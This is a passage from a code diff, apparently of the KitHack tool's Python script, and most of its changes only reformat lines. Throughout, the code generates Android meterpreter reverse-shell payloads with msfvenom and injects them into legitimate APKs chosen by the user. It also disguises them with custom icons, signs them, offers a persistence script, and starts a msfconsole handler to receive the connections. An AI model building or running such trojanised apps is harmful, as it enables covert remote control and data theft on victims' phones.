{1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -3963,471 +3234,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -4455,471 +3648,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst 